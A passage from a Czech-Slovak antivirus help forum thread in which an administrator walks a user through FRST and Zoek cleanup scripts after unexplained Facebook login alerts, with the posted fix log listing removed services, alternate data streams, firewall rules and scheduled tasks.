FirewallRules: [TCP Query User{916FC264-EED5-4BB7-9B18-F8ADE1CC8CF0}C:0\windows programy\eclipse\eclipse.exe] => (Allow) C:0\windows programy\eclipse\eclipse.exe => No File
FirewallRules: [UDP Query User{E125AE56-1109-4C2E-8FD4-B67BA7DB3D7B}C:0\windows programy\eclipse\eclipse.exe] => (Allow) C:0\windows programy\eclipse\eclipse.exe => No File
FirewallRules: [TCP Query User{5A1E576C-C69B-4EA0-A00E-9DB366EB4991}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe] => (Allow) C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe => No File
FirewallRules: [UDP Query User{F8DABE4A-53B9-42AF-A20F-99AF53E57D45}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe] => (Allow) C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe => No File
FirewallRules: [{5990ECB6-4B3B-4441-A614-264DCBBF16F2}] => (Allow) I:\windows programy\davinci\ElementsPanelDaemon.exe => No File
FirewallRules: [{FC9A4AA6-7DF0-48D7-85E3-08B9F860D161}] => (Allow) I:\windows programy\davinci\OxygenPanelDaemon.exe => No File
FirewallRules: [{257BE348-CCF6-4567-A911-19F0393770BC}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe => No File

EmptyTemp:
Hosts:
End
Uložte do C:\Users\John\Downloads jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

mivefe5888
Návštěvník
Návštěvník
Příspěvky: 6
Registrován: 23 lis 2023 19:26

Re: Prihlasovanie do FB, otvaranie okien v browseri

#7 Příspěvek od mivefe5888 »

Fix result of Farbar Recovery Scan Tool (x64) Version: 16.02.2024
Ran by John (18-02-2024 10:10:50) Run:12
Running from C:\Users\John\Downloads
Loaded Profiles: John & Test
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:
HKLM-x32\...\Run: [] => [X]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {AC5DCEC8-7ADC-420A-928F-2E4D77508D8B} - System32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {795E77E3-0EEC-4504-9D64-C02F56BB6298} - System32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {E1303010-25DC-4FEC-9EBE-33A7E35BB7B3} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer.021f431b30104264a8dbbd90054a1361\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe (No File)
S3 qmeyutfnfe; \??\C:\Windows\eqyvkatwim.sys [X]
S3 rxyfbwoazs; \??\C:\Windows\kytgzgrgpv.sys [X]
S3 USBAAPL64; System32\Drivers\usbaapl64.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
S3 cqwzjpilmi; \??\C:\Windows\xdmkcicuts.sys [X]
S3 Mac606; system32\DRIVERS\Mac606.sys [X]
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}
C:\Program Files (x86)\8iq24splw1.dat
C:\Users\John\AppData\Roaming\changzhi_leidian.data
ContextMenuHandlers1: [GDContextMenu] -> [CC]{BB02B294-8425-42E5-983F-41A1FA970CD6} => -> No File
ContextMenuHandlers1: [GpgEX] -> [CC]{CCD955E4-5C16-4A33-AFDA-A8947A94946B} => -> No File
ContextMenuHandlers4: [GpgEX] -> [CC]{CCD955E4-5C16-4A33-AFDA-A8947A94946B} => -> No File
ContextMenuHandlers1_S-1-5-21-949114339-2066100574-2594248327-1000: [CloudStation.SyncFolderContextMenu] -> {2C4A5D61-009C-4561-9A33-6AFD542FD237} => C:\Users\John\AppData\Local\SynologyDrive\SynologyDrive.app\icon-overlay\22\x64\ContextMenu.dll [2022-04-21] (Synology Inc. -> )
ContextMenuHandlers6_S-1-5-21-949114339-2066100574-2594248327-1000: [CloudStation.SyncFolderContextMenu] -> {2C4A5D61-009C-4561-9A33-6AFD542FD237} => C:\Users\John\AppData\Local\SynologyDrive\SynologyDrive.app\icon-overlay\22\x64\ContextMenu.dll [2022-04-21] (Synology Inc. -> )
AlternateDataStreams: C:\Windows\system32\-1.14-windows.xml:B72225CA78 [10]
AlternateDataStreams: C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0:74DBE02D40 [10]
AlternateDataStreams: C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0:23D10F59A6 [10]
AlternateDataStreams: C:\Windows\system32\AcpiServiceVnA64.dll:ECA79956BD [10]
AlternateDataStreams: C:\ProgramData\DP45977C.lfl:677104FCAA [10]
AlternateDataStreams: C:\ProgramData\ReclaiMe.config:AC4DBEED78 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk:8ACB4E955C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\WebDrive.lnk:D8006AA692 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk:0E0659E205 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2015.lnk:37833A1060 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Audition CC 2015.lnk:38307C6C28 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator CC 2018.lnk:DAEDFEEC9C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CC 2015.lnk:742FE07988 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro CC 2018.lnk:6306D2B3A2 [10]
AlternateDataStreams: C:\Users\John\Desktop\normal paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\normal paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\obrazok full.bmp:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\obrazok full.bmp:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [83]
AlternateDataStreams: C:\Users\John\Desktop\paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\scaner.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\scaner.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\trident paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\trident paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Public\DRM:احتضان [48]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [2716]
FirewallRules: [{381E8692-D05F-4768-A03E-BFB42D82C8D3}] => (Allow) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [{EDDFFEFC-8551-4AA9-BE1C-EB1B265415F1}] => (Allow) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [{030F7113-6734-41CD-A4E5-D34B67B56903}] => (Block) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [TCP Query User{50B80FF9-B48B-48D6-A507-0EA094981F89}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe] => (Allow) C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe => No File
FirewallRules: [UDP Query User{C90E849D-29A2-4C03-B8A7-1792AD84086D}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe] => (Allow) C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe => No File
FirewallRules: [TCP Query User{96283949-D938-4702-90E1-A40E3D5EA41F}C:\program files\java\jdk-17.0.2\bin\javaw.exe] => (Allow) C:\program files\java\jdk-17.0.2\bin\javaw.exe => No File
FirewallRules: [UDP Query User{06C70B7D-B663-495B-9A18-DACF08A4EBFF}C:\program files\java\jdk-17.0.2\bin\javaw.exe] => (Allow) C:\program files\java\jdk-17.0.2\bin\javaw.exe => No File
FirewallRules: [TCP Query User{916FC264-EED5-4BB7-9B18-F8ADE1CC8CF0}C:0\windows programy\eclipse\eclipse.exe] => (Allow) C:0\windows programy\eclipse\eclipse.exe => No File
FirewallRules: [UDP Query User{E125AE56-1109-4C2E-8FD4-B67BA7DB3D7B}C:0\windows programy\eclipse\eclipse.exe] => (Allow) C:0\windows programy\eclipse\eclipse.exe => No File
FirewallRules: [TCP Query User{5A1E576C-C69B-4EA0-A00E-9DB366EB4991}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe] => (Allow) C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe => No File
FirewallRules: [UDP Query User{F8DABE4A-53B9-42AF-A20F-99AF53E57D45}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe] => (Allow) C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe => No File
FirewallRules: [{5990ECB6-4B3B-4441-A614-264DCBBF16F2}] => (Allow) I:\windows programy\davinci\ElementsPanelDaemon.exe => No File
FirewallRules: [{FC9A4AA6-7DF0-48D7-85E3-08B9F860D161}] => (Allow) I:\windows programy\davinci\OxygenPanelDaemon.exe => No File
FirewallRules: [{257BE348-CCF6-4567-A911-19F0393770BC}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe => No File

EmptyTemp:
Hosts:
End
*****************

Processes closed successfully.
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => removed successfully

"C:\Windows\system32\GroupPolicy\Machine" folder move:

C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => moved successfully
C:\ProgramData\NTUSER.pol => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{AC5DCEC8-7ADC-420A-928F-2E4D77508D8B}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AC5DCEC8-7ADC-420A-928F-2E4D77508D8B}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{795E77E3-0EEC-4504-9D64-C02F56BB6298}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{795E77E3-0EEC-4504-9D64-C02F56BB6298}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E1303010-25DC-4FEC-9EBE-33A7E35BB7B3}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E1303010-25DC-4FEC-9EBE-33A7E35BB7B3}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\VisualStudio\Updates\BackgroundDownload" => removed successfully
HKLM\System\CurrentControlSet\Services\qmeyutfnfe => removed successfully
qmeyutfnfe => service removed successfully
HKLM\System\CurrentControlSet\Services\rxyfbwoazs => removed successfully
rxyfbwoazs => service removed successfully
HKLM\System\CurrentControlSet\Services\USBAAPL64 => removed successfully
USBAAPL64 => service removed successfully
HKLM\System\CurrentControlSet\Services\xhunter1 => removed successfully
xhunter1 => service removed successfully
HKLM\System\CurrentControlSet\Services\cqwzjpilmi => removed successfully
cqwzjpilmi => service removed successfully
HKLM\System\CurrentControlSet\Services\Mac606 => removed successfully
Mac606 => service removed successfully
"C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}" => not found
"C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}" => not found
C:\Program Files (x86)\8iq24splw1.dat => moved successfully
C:\Users\John\AppData\Roaming\changzhi_leidian.data => moved successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\GDContextMenu => removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\GpgEX => removed successfully
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\GpgEX => removed successfully
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\Software\Classes\*\ShellEx\ContextMenuHandlers\CloudStation.SyncFolderContextMenu => removed successfully
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\SOFTWARE\Classes\CLSID\{2C4A5D61-009C-4561-9A33-6AFD542FD237} => removed successfully
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\Software\Classes\Folder\ShellEx\ContextMenuHandlers\CloudStation.SyncFolderContextMenu => removed successfully
C:\Windows\system32\-1.14-windows.xml => ":B72225CA78" ADS removed successfully
C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 => ":74DBE02D40" ADS removed successfully
C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 => ":23D10F59A6" ADS removed successfully
C:\Windows\system32\AcpiServiceVnA64.dll => ":ECA79956BD" ADS removed successfully
C:\ProgramData\DP45977C.lfl => ":677104FCAA" ADS removed successfully
C:\ProgramData\ReclaiMe.config => ":AC4DBEED78" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk => ":8ACB4E955C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini => ":B1DA6C571C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\WebDrive.lnk => ":D8006AA692" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk => ":0E0659E205" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2015.lnk => ":37833A1060" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Audition CC 2015.lnk => ":38307C6C28" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk => ":7661CCE9BF" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator CC 2018.lnk => ":DAEDFEEC9C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CC 2015.lnk => ":742FE07988" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro CC 2018.lnk => ":6306D2B3A2" ADS removed successfully
C:\Users\John\Desktop\normal paska.jpeg => ":3or4kl4x13tuuug3Byamue2s4b" ADS could not remove.
C:\Users\John\Desktop\normal paska.jpeg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully
C:\Users\John\Desktop\obrazok full.bmp => ":3or4kl4x13tuuug3Byamue2s4b" ADS could not remove.
C:\Users\John\Desktop\obrazok full.bmp => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully
C:\Users\John\Desktop\paska.jpeg => ":3or4kl4x13tuuug3Byamue2s4b" ADS could not remove.
C:\Users\John\Desktop\paska.jpeg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully
C:\Users\John\Desktop\scaner.jpeg => ":3or4kl4x13tuuug3Byamue2s4b" ADS could not remove.
C:\Users\John\Desktop\scaner.jpeg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully
C:\Users\John\Desktop\trident paska.jpeg => ":3or4kl4x13tuuug3Byamue2s4b" ADS could not remove.
C:\Users\John\Desktop\trident paska.jpeg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully
C:\Users\Public\DRM => ":احتضان" ADS removed successfully
C:\Users\Public\Shared Files => ":VersionCache" ADS removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{381E8692-D05F-4768-A03E-BFB42D82C8D3}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{EDDFFEFC-8551-4AA9-BE1C-EB1B265415F1}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{030F7113-6734-41CD-A4E5-D34B67B56903}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{50B80FF9-B48B-48D6-A507-0EA094981F89}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{C90E849D-29A2-4C03-B8A7-1792AD84086D}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{96283949-D938-4702-90E1-A40E3D5EA41F}C:\program files\java\jdk-17.0.2\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{06C70B7D-B663-495B-9A18-DACF08A4EBFF}C:\program files\java\jdk-17.0.2\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{916FC264-EED5-4BB7-9B18-F8ADE1CC8CF0}C:0\windows programy\eclipse\eclipse.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{E125AE56-1109-4C2E-8FD4-B67BA7DB3D7B}C:0\windows programy\eclipse\eclipse.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{5A1E576C-C69B-4EA0-A00E-9DB366EB4991}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{F8DABE4A-53B9-42AF-A20F-99AF53E57D45}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5990ECB6-4B3B-4441-A614-264DCBBF16F2}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{FC9A4AA6-7DF0-48D7-85E3-08B9F860D161}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{257BE348-CCF6-4567-A911-19F0393770BC}" => removed successfully
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

FlushDNS => completed
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 75007194 B
Java, Discord, Steam htmlcache, WinHttpAutoProxySvc/winhttp *.cache => 611453322 B
Windows/system/drivers => 363314582 B
Edge => 0 B
Chrome => 353424969 B
Firefox => 116041466 B
Opera => 165074806 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 0 B
systemprofile32 => 128 B
LocalService => 128 B
NetworkService => 836984 B
John => 64055413552 B
Test => 64074968159 B

RecycleBin => 467863419 B
EmptyTemp: => 121.3 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 10:18:25 ====

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118715
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Prihlasovanie do FB, otvaranie okien v browseri

#8 Příspěvek od Rudy »

Smazáno. Nastala nějaká změna?
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

mivefe5888
Návštěvník
Návštěvník
Příspěvky: 6
Registrován: 23 lis 2023 19:26

Re: Prihlasovanie do FB, otvaranie okien v browseri

#9 Příspěvek od mivefe5888 »

Skusil som sa znova prihlasit na FB a po chvili mi znova doslo upozornenie ze sa tam niekto prihlasil a musim zmenit heslo, takze ziadna zmena

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118715
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Prihlasovanie do FB, otvaranie okien v browseri

#10 Příspěvek od Rudy »

Mně to chodí také. Jenže vím, že jsem to já. Už jsem to reklamoval, ovšem FB nic. Nwejste to vy sám?
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

mivefe5888
Návštěvník
Návštěvník
Příspěvky: 6
Registrován: 23 lis 2023 19:26

Re: Prihlasovanie do FB, otvaranie okien v browseri

#11 Příspěvek od mivefe5888 »

Nakolko mi tam pise ze prihlasenie bolo z Chrome pre Windows 10, a deje sa to iba ked sa prihlasim cez svoj PC, kedy pouzivam operu a mam windows 7, tak ja sam to nebudem a ani si nemyslim ze by to bola chyba facebooku, kedze na notebooku sa mozem prihlasit bez problemov a ziadny problem, zaroven pouzivam rovnaky PC uz niekolko rokov.

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118715
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Prihlasovanie do FB, otvaranie okien v browseri

#12 Příspěvek od Rudy »

Tak to asi ne. Mně chodí maily, kde je uveden stejný čas, jako když se tam přihlašuji já, stejný prohlížeč a stejný oper. systém. Můžeme ještě provést vyčištění prohlížečů:

Spusťte postupně tyto utility:


1. 1. Stahnete Zoek.exe https://www.edisk.cz/stahni/21334/zoek.rar_1.3MB.html/ a ulozte jej na plochu

Pokud pouzivate Win Vista ci W7, kliknete na Zoek pravym a dejte Run As Administrator ci Spustit jako spravce
Do okna vlozte skript nize




autoclean;
resethosts;
emptyclsid;
IEdefaults;
FFdefaults;
CHRdefaults;
emptyIEcache;
emptyFFcache;
emptyCHRcache;
emptyalltemp;
emptyflash;
emptyjava;
emptyrecycle.bin;





Nasledne kliknete na Run Script
PC provede opravu, restartuje se a da Vam log, jeho obsah vlozte sem.

a

2. Junkware removal tool: https://www.stahuj.cz/utility_a_ostatni ... oval-tool/
•Ulozte nejlepe na plochu
•Po spusteni se zobrazi licencni podminky, stisknete libovolnou klavesu
•Probehne vytvoreni zalohy a nasledne prohledavani
•Probehne skenovani a pak se objevi log, pripadne bude ulozen v c:\JRT jako JRT.txt, ten sem vlozte.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

Odpovědět